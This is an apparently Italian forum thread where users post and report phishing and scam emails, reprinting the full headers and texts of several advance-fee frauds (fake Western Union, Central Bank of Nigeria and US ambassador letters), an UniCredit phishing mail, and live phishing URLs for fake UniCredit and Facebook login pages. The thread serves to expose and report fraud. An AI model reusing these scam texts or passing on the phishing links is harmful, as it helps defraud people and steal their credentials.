Received: from mf-smf-ucb007.ocn.ad.jp (mf-smf-ucb007.ocn.ad.jp [153.149.231.6]) by mbkd0326.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXX; Sun, 22 Oct 2017 02:3X:XX +0900 (JST)
Received: from mf-smf-ucb007.ocn.ad.jp (mf-smf-ucb007 [153.149.231.6]) by mf-smf-ucb007.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXX; Sun, 22 Oct 2017 02:3X:XX +0900 (JST)
Received: from msgw011-05.ocn.ad.jp (msgw011-05.ocn.ad.jp [180.37.203.214]) by mf-smf-ucb007.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id XXXXXXXXXXXXXX; Sun, 22 Oct 2017 02:3X:XX +0900
Received: from User (p24180-ipbffx02sizuokaden.shizuoka.ocn.ne.jp [122.27.255.180]) by msgw011-05.ocn.ad.jp (Postfix) with SMTP id XXXXXXXXXXX; Sun, 22 Oct 2017 02:3X:XX +0900 (JST)
Reply-To: <wharton.peter@yandex.com>
From: Peter <w.pete@tulip.ocn.ne.jp>
Subject: INVESTMENT PARTNERSHIP PROPOSAL !!!
Date: Sat, 21 Oct 2017 17:3X:XX -0000
MIME-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <XXXXXXXXXXXXXX.XXXXXXXXXXX@msgw011-05.ocn.ad.jp>
To: undisclosed-recipients:;
Corpo del messaggio:

Codice: Seleziona tutto

<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY bgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONT size=2 color=#000000 face="Arial">
<DIV>
<FONT size=3 face="Myanmar Text">Hello,</FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text">I got your contact from a Business Directory in my search for a trustworthy and reliable partner for project investments. I&nbsp; reach you via your email so that we can work together in this project worth millions of Dollars if you are interested in discussing this further. </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text">If that is the case email me for discussion of this matter in detail. I assure you that this project is feasible. I will discuss further details when I am sure of your willingness to do this deal with me.</FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text">Looking forward to hearing from you soonest.</FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text">Regards</FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text"> </FONT></DIV>
<DIV>
<FONT size=3 face="Myanmar Text">Peter</FONT></DIV>
</FONT>
</BODY></HTML>

III:
Intestazioni:

Codice: Seleziona tutto

Received: by 10.157.47.219 with SMTP id XXXXXXXXXXXXXXXX;
        Wed, 1 Nov 2017 19:4X:XX -0700 (PDT)
X-Received: by 10.101.68.202 with SMTP id XXXXXXXXXXXXXXX.XX.XXXXXXXXXXXXX;
        Wed, 01 Nov 2017 19:4X:XX -0700 (PDT)
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of www.@pony.ocn.ne.jp designates 153.149.230.10 as permitted sender) smtp.mailfrom=www.@pony.ocn.ne.jp
Return-Path: <www.@pony.ocn.ne.jp>
Received: from mbkd0109.ocn.ad.jp (mbkd0109.ocn.ad.jp. [153.149.230.10])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXX.XXX.2017.11.01.19.4X.XX;
        Wed, 01 Nov 2017 19:4X:XX -0700 (PDT)
Received-SPF: pass (google.com: domain of www.@pony.ocn.ne.jp designates 153.149.230.10 as permitted sender) client-ip=153.149.230.10;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of www.@pony.ocn.ne.jp designates 153.149.230.10 as permitted sender) smtp.mailfrom=www.@pony.ocn.ne.jp
Received: from mf-smf-ucb003.ocn.ad.jp (mf-smf-ucb003.ocn.ad.jp [153.149.227.5]) by mbkd0109.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXX; Thu,
  2 Nov 2017 11:4X:XX +0900 (JST)
Received: from mf-smf-ucb003.ocn.ad.jp (mf-smf-ucb003 [153.149.227.5]) by mf-smf-ucb003.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXX; Thu,
  2 Nov 2017 11:4X:XX +0900 (JST)
Received: from ntt.pod01.mv-mta-ucb022 (mv-mta-ucb022.ocn.ad.jp [153.149.142.85]) by mf-smf-ucb003.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id XXXXXXXXXXXXXX; Thu, 2 Nov 2017 11:4X:XX +0900
Received: from vcwebmail.ocn.ad.jp ([153.149.227.166]) by ntt.pod01.mv-mta-ucb022 with id XXXXXXXXXXXXXXXXXXXXXX; Thu, 02 Nov 2017 02:4X:XX +0000
Received: from mzcstore372.ocn.ad.jp (mz-fcb372p.ocn.ad.jp [180.37.198.197]) by vcwebmail.ocn.ad.jp (Postfix) with ESMTP; Thu,
  2 Nov 2017 11:4X:XX +0900 (JST)
Date: Thu, 2 Nov 2017 11:4X:XX +0900 (JST)
From: "Mr.Alex Mark" <"www."@pony.ocn.ne.jp>
Reply-To: "Mr.Alex Mark" <westernunion8382@gmail.com>
Message-ID: <XXXXXXXXXX.XXXXXXXX.XXXXXXXXXXXXX.JavaMail.root@pony.ocn.ne.jp>
Subject: CONGRATULATION
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-Originating-IP: [197.234.219.29]
Corpo del messaggio:

Codice: Seleziona tutto

This is from western Union Money Transfer Office, The 
conclusion of the meeting on Friday by UNITED NATIONS 
stated that you will be receiving your approved total 
sum of $2.5USD under our custody which your first 
payment of $5000.usd had been transferred to you, so 
you have to contact the Western Union manager Mr Alex 
Mark phone number(+22999641634)Email(westernunion8382@gmail.com)
and ask him to give you the details of your first payment of $5000.
once you reconfirmed your details to him as soon as possible.

1.Your First Name..........
2.Your Second Name.........
3.Your Country...........
4.Your City..............
5.Your Telephone.......

Best Regards,
mr. Alex Mark


IV:
Intestazioni:

Codice: Seleziona tutto

Received: by 10.157.47.197 with SMTP id XXXXXXXXXXXXXX;
        Thu, 9 Nov 2017 22:1X:XX -0800 (PST)
X-Received: by 10.98.76.206 with SMTP id XXXXXXXXXXXXXXX.XX.XXXXXXXXXXXXX;
        Thu, 09 Nov 2017 22:1X:XX -0800 (PST)
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of sh.@giga.ocn.ne.jp designates 114.147.58.89 as permitted sender) smtp.mailfrom=sh.@giga.ocn.ne.jp
Return-Path: <sh.@giga.ocn.ne.jp>
Received: from mogw0319.ocn.ad.jp (mogw0319.ocn.ad.jp. [114.147.58.89])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXXX.XXX.2017.11.09.22.1X.XX;
        Thu, 09 Nov 2017 22:1X:XX -0800 (PST)
Received-SPF: pass (google.com: domain of sh.@giga.ocn.ne.jp designates 114.147.58.89 as permitted sender) client-ip=114.147.58.89;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of sh.@giga.ocn.ne.jp designates 114.147.58.89 as permitted sender) smtp.mailfrom=sh.@giga.ocn.ne.jp
Received: from mf-smf-ucb007.ocn.ad.jp (mf-smf-ucb007.ocn.ad.jp [153.149.231.6])
	by mogw0319.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXX;
	Fri, 10 Nov 2017 15:1X:XX +0900 (JST)
Received: from mf-smf-ucb007.ocn.ad.jp (mf-smf-ucb007 [153.149.231.6])
	by mf-smf-ucb007.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXX;
	Fri, 10 Nov 2017 15:1X:XX +0900 (JST)
Received: from msgw002-02.ocn.ad.jp (msgw002-02.ocn.ad.jp [180.37.203.77])
	by mf-smf-ucb007.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id XXXXXXXXXXXXXX;
	Fri, 10 Nov 2017 15:1X:XX +0900
Received: from User (p2215195-ipngn200707osakachuo.osaka.ocn.ne.jp [153.190.170.195])
	by msgw002-02.ocn.ad.jp (Postfix) with SMTP id XXXXXXXXXXX;
	Fri, 10 Nov 2017 15:1X:XX +0900 (JST)
Reply-To: <infor.bankkcbn2017@gmail.com>
From: "\"Mr.Godwin Emefiele\"<"<"sh."@giga.ocn.ne.jp>
Subject: CBN APPROVED PAYMENT LETTER.
Date: Thu, 9 Nov 2017 22:1X:XX -0800
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <XXXXXXXXXXXXXX.XXXXXXXXXXX@msgw002-02.ocn.ad.jp>
To: undisclosed-recipients:;
Corpo del messaggio:

Codice: Seleziona tutto

<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY bgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONT size=2 color=#000000 face="Arial">
<DIV>
<FONT size=3> Hello,</FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CBN APPROVED PAYMENT LETTER.</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>Good to contact you this day i have just been appointed the new Governor of the CBN and on assumption in office i have seen your untreated transaction with my else while predecessor Dr. Lamido Sanusi, i have seen the records of all your payment made in the past to CBN and also have a complete files of yours here with me.</FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>This is to let you know that your case has repeatedly coming to my Office everyday and all the complain that I have been getting all in regards to your payment with the Federal Government of Nigeria which the CBN has been involved to pay to you. Enough of this entire allegation that we have been adamant over your payment, i want you to know that we have to end everything now without further issues. I am handling this payment myself and I have approved the sum of US$10,700,000.00 for you and I don’t want to know how much you are supposed to be paid. I have a meeting with Mr. President Muhammadu Buhari and the Finance Ministry who have agreed that I should handle this payment myself and Make sure that your funds is wired into your account with immediate effect.</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3>I want to let you know that we are securing all payment transfer papers that will delay your payment such as: The Anti Terrorist and Drug Law Clearances, Financial Service Authority (FSA), Federal Deposit Insurance Corporation (FDIC). The Financial Crimes Enforcement Network (FinCEN) AND The Financial Action Task Force (on Money Laundering) (FATF). Without this Clearances nothing will be done,&nbsp; and with my position as the Central Bank Of Nigeria Executive</FONT></DIV>
<DIV>
<FONT size=3>Governor, you will only pay for your representative Attorney stamp and signatory of the above mentioned documents for your payment to be paid to you.</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3>This is the only way I can help you get your long awaited payment transferred into your Bank Account or by an ATM CARD Delivery,&nbsp; if youare serious to receive your fund as I stated, you will have to get back to me with the listed information bellow and indicate if you wish to receive your funds through a telegraphic wire transfer or by ATM CARD delivery to your doorstep.</FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>I will want to have a one on one conversation with you so i advise you to call me as soon as you get this mail so that i can know what actually went wrong and why you weren't paid along with others. if you want to know more about my new appointment as the BOSS of CBN please call the Nigerian government,</FONT></DIV>
<DIV>
<FONT size=3>USE THIS EMAIL ADDRESS (infor.bankcbn2017@gmail.com) AND CONTACT THE CBN PAYEE MASTER WITH YOUR DIRECT PHONE NUMBER AND PERSONAL DETAILS,</FONT></DIV>
<DIV>
<FONT size=3>ONCE YOU READ THIS EMAIL AND GET BACK TO ME WITH THE LISTED INFORMATION BELLOW. Re-confirm to me the followings information to enable the urgent processing of your payment.</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3>1.Beneficiary Name</FONT></DIV>
<DIV>
<FONT size=3>2.Direct Phone number and fax</FONT></DIV>
<DIV>
<FONT size=3>3.Personal Address.</FONT></DIV>
<DIV>
<FONT size=3>4.Age,profession and sex.</FONT></DIV>
<DIV>
<FONT size=3>5.Copy of ID.</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3>Endeavor to call me as soon as you get this mail on my official number below in this mail.</FONT></DIV>
<DIV>
<FONT size=3>Treat as top urgent.</FONT></DIV>
<DIV>
<FONT size=3>&nbsp;</FONT></DIV>
<DIV>
<FONT size=3> </FONT></DIV>
<DIV>
<FONT size=3>Regards,</FONT></DIV>
<DIV>
<FONT size=3>Mr.Godwin Emefiele</FONT></DIV>
<DIV>
<FONT size=3>Executive Governor</FONT></DIV>
<DIV>
<FONT size=3>Central Bank of Nigeria.</FONT></DIV>
</FONT>
</BODY></HTML>
“The quieter you become, the more you can hear”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Un messaggio dall'ex ambasciatore degli Stati Uniti presso la Repubblica del Benin...

Intestazioni:

Codice: Seleziona tutto

Delivered-To: [redacted]@gmail.com
Received: by 10.157.47.194 with SMTP id XXXXXXXXXXXXXX;
        Sat, 16 Dec 2017 00:3X:XX -0800 (PST)
X-Received: by 10.223.178.87 with SMTP id XXXXXXXXXXXXXXXX.X.XXXXXXXXXXXXX;
        Sat, 16 Dec 2017 00:3X:XX -0800 (PST)
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: best guess record for domain of mauro.checchinato@alice.it designates 82.57.200.117 as permitted sender) smtp.mailfrom=mauro.checchinato@alice.it
Return-Path: <mauro.checchinato@alice.it>
Received: from smtp301.alice.it (smtp301.alice.it. [82.57.200.117])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXX.XXX.2017.12.16.00.3X.XX;
        Sat, 16 Dec 2017 00:3X:XX -0800 (PST)
Received-SPF: pass (google.com: best guess record for domain of mauro.checchinato@alice.it designates 82.57.200.117 as permitted sender) client-ip=82.57.200.117;
Authentication-Results: mx.google.com;
       spf=pass (google.com: best guess record for domain of mauro.checchinato@alice.it designates 82.57.200.117 as permitted sender) smtp.mailfrom=mauro.checchinato@alice.it
Received: from feu34-alice (82.57.205.56) by smtp301.alice.it (8.6.060.43)
        id XXXXXXXXXXXXXXXX; Sat, 16 Dec 2017 09:3X:XX +0100
Received: from (197.234.219.114) by wmlight.pc.tim.it;  Sat, 16 Dec 2017 09:3X:XX +0100
Message-ID: <XXXXXXXXXXX.mauro.checchinato@alice.it>
Date: Sat, 16 Dec 2017 09:3X:XX +0100 (CET)
From: "Mr. john mark" <mauro.checchinato@alice.it>
Reply-To: johnmark281@outlook.com
Subject: From the Former United States Ambassador to Republic of Benin,
Mime-Version: 1.0
Content-Type: text/plain;charset="UTF-8"
Content-Transfer-Encoding: 7bit
X-Originating-IP: 197.234.219.114
Corpo del messaggio:

Codice: Seleziona tutto

This is Mr. john mark the Former United States Ambassador  Republic of Benin, I 
came down here in Cotonou Benin Republic for an ECOWAS meeting and I was 
searching for some files that I left in this office before I left and found out 
that you have not received your fund, and I asked the present ambassador Mr 
James Knight what happened that you have not receive your fund and he said that 
you refused to pay the required fee for the delivery of your ATM CARD.amount of 
money $2.5m

I'm contacting you this morning because the director of the ATM CARD center 
here in Benin Republic said that they will divert your ATM CARD to the 
Government Treasury just because that you cannot pay for the service fee of 
your ATM CARD which is $150.00 only according to them.
But I told them to wait until I hear from you today so that I will know the 
reason why you rejected such amount of money $2.5m which will change your life 
just because of $150.00.

I want your urgent response as soon as you receive this email and explain to me 
the reason why you have abandon your ATM CARD because of $150.00. But if you 
don't need it then I can change your name to another person so that this 
Government will not claim this money but I know that you will love to have it.
Please my dear I want to help you to receive this fund because it was a big 
shock to me that you have not receive your ATM CARD and withdraw your money 
since 1 years now and I'm very sorry for that and you will receive your fund 
before the end of this meeting which will take us 4 days and I will be here to 
monitor it until you receive your fund. 

This is where you should send the fee today and don't fail to do that as I have 
said.

Receiver Name==== Paul Ike 
Country =======Benin Republic
City ============= Cotonou
Text Question ===== today
Answer ============ Yes
Amount ======== $150.00
Sender Name ====
Mtcn ====
I will wait to hear from you today with the mtcn number.

the Former United States Ambassador to Republic of Benin,
Finally, make sure that you reconfirm your full details.
1) FULL NAMES:
2) DELIVERY ADDRESS:
3) PHONE NUMBER/
4) COUNTRY:

call me.....+22999597463

Mr. john mark
the Former United States Ambassador to Republic of Benin,
“The quieter you become, the more you can hear”
Avatar utente
leofelix
Amministratore
Amministratore
Messaggi: 5130
Iscritto il: mer lug 03, 2013 11:46 am
Località: Bugliano

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da leofelix »

c'è qualche anima pia disposta a segnalare a google safe browsing questa falsa pagina di log in Unicredit?
Anche con l'estensione "site reporter" per Chrome da solo temo di non farcela.
Ne ho inviate alcune su phishtank, ma non si visualizzano.
Il path cambia di volta in volta, da sessione a sessione.
Netcraft/Opera e qualche altro antivirus con protezione web lo blocca di già.


http://private.unicred.it.contservizi.privati.dati.societari.bancaprossima.indexfghtyr5643ewdsfgtyrhgefwdsfghytref4wdscxfvgtref.compat.com.pl/sdfbgterfw/

Immagine

qui per segnalare senza visitare il sito (potrebbe essere anche infetto e non sarebbe nemmeno la prima volta)
https://safebrowsing.google.com/safebrowsing/report_phish/?hl=it

Se siete interessati agli headers eccoli (ovviamente abuse@virgilio.it è fittizio)

Codice: Seleziona tutto

Return-Path: <glamour@kaliningrad.ru>
Delivered-To: abuse@virgilio.it
Received: from dcd-15 ([10.103.10.41])
	by dcbackend-22.iol.local with LMTP id SLKiOlBAK15IMgcAkpKTWQ
	for <abuse@virgilio.it>; Fri, 24 Jan 2020 20:06:56 +0100
Received: from dcp-16.iol.local ([10.103.10.41])
	by dcd-15 with LMTP id kL+JOlBAK15qigEAkA0XfQ
	; Fri, 24 Jan 2020 20:06:56 +0100
Received: from virgilio.it ([10.103.10.41])
	by dcp-16.iol.local with LMTP id CIC7JVBAK15QRQEA26Pe9g
	; Fri, 24 Jan 2020 20:06:56 +0100
Received: from mail.bytecity.ru ([80.250.64.5])
	by smtp-41.iol.local with ESMTP
	id v4ICiiaIcdWtCv4ICirpR6; Fri, 24 Jan 2020 20:06:56 +0100
X-IOL-DMARC: Dominio kaliningrad.ru non supporta DMARC  
X-IOL-DKIM: Messaggio non firmato
X-IOL-SPF: pass con l'IP 80.250.64.5;kaliningrad.ru
X-IOL-SEC: _SPFOK_NODKIM_NODMARC
x-libjamoibt: 2601
Received-SPF: pass
X-CNFS-Analysis: v=2.3 cv=YqFxuLQX c=1 sm=1 tr=0
 a
Message-ID: <cdc00e3916c377d537d0812b91d44cbb@smtp-41.iol.local>
Received: from [37.221.114.111] (helo=just-TEST)
	by mail.bytecity.ru (Exim) with esmtpa 
	sent  from <glamour@kaliningrad.ru> for <abuse@virgilio.it>
	id 1iv4IB-000I3k-UE
	2b69c122645cec7da6ee3e979791ca18; Fri, 24 Jan 2020 21:06:56 +0200
From:  Uni-Credit-Privati-SpA  <glamour@kaliningrad.ru>
To: abuse@virgilio.it
Subject:  53978402-5309842 
Content-Type: text/html
Date: Fri, 24 Jan 20 19:06:55 +0000
X-ACL-Warn: Message does not conform to RFC2822 standard
X-CMAE-Envelope: MS4wfOk4IQbFoAVN7UyrxUjane5lUxAbQRffVqh0yWjpKFB5O+f4eKktp1zgumKnMDllK23DBaDmWEW1neyUesC7brlkD4ClIHU+y/eM68svjwwiTzAPohvO
 N69zUfzm9z1FjpCr9dGkNOpirGFiLyJXj1v5ghDp2yx3Z/GIxNTphIc+Y29C+kQFTNyH+ind74Ug/Q==


Gentile cliente, abuse@virgilio.it

Siamo spiacenti di informarla che abbiamo deciso di sospendere le sue operazioni sul sito, visto che lei ha ignorato la precedente richiesta di confermare la sua identità.

Per poter riutilizzare la sua carta/conto, si prega di confermare immediatamente le informazioni rilasciate sul nostro sito al momento della sua registrazione.

La procedura può essere completata cliccando sul link sottostante, che la porterà sul nostro sito nella sezione dedicata alle verifiche:

https://www.unicredit.it/it/privati.html

 
 	
Il Titolare del Trattamento è UniCredit S.p.A. con sede legale presso Piazza Gae Aulenti n. 3, Tower A, 20154 Milano (la Banca o UniCredit).
 
 	
Il Responsabile della protezione dei dati può essere contattato presso UniCredit S.p.A., Data Protection Office, Piazza Gae Aulenti n. 1, Tower B, 20154 Milano

:grazie
Avanti è la vita
Avatar utente
leofelix
Amministratore
Amministratore
Messaggi: 5130
Iscritto il: mer lug 03, 2013 11:46 am
Località: Bugliano

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da leofelix »

C'è qualche volontario disposto a segnalare a google safe browsing questa falsa pagina di log in Facebook?

Immagine


http://society-depart.my.id/recovery.html


Sono esasperato, sono quattro giorni che segnalo a google. E' ormai bloccato da tutti i sistemi di sicurezza immaginabili, ma per Google è tutto ok..

Anche l'URL relativo la falsa pagina di log in Unicredit di cui avevo parlato nel post precedente è ancora attivo. Per Google è una pagina sicura, mentre netcraft/Opera, Phishtank (e quindi OpenDNS), Eset e Kaspersky e persino McAfee e Norton la bloccano.

Riscrivo l'URL
http://private.unicred.it.contservizi.privati.dati.societari.bancaprossima.indexfghtyr5643ewdsfgtyrhgefwdsfghytref4wdscxfvgtref.compat.com.pl/sdfbgterfw/

Aiutando me, aiutate tutte quelle persone che non sanno cosa è il phishing e ci cascano e non sono poche.


S.O.S


URL per segnalare a Google

https://safebrowsing.google.com/safebrowsing/report_phish/?hl=it


Grazie :grazie
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

leofelix ha scritto: mer feb 05, 2020 12:43 am ht---tp://society-depart.my.id/recovery.html
Vediamo quando proveranno ad utiizzare la mail e la login che gli ho inserito :D
Forse dovranno usare google translate per capire cosa gli ho detto.
Interessante che dopo la login ti rimanda alla pagina ufficiale di facebook.

Segnalati. :ciao
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Re: Segnalazioni di mail di phishing o malware vario

Messaggio da System » mer feb 05, 2020 4:14 am


Rispondi
  • Argomenti simili
    Risposte
    Visite
    Ultimo messaggio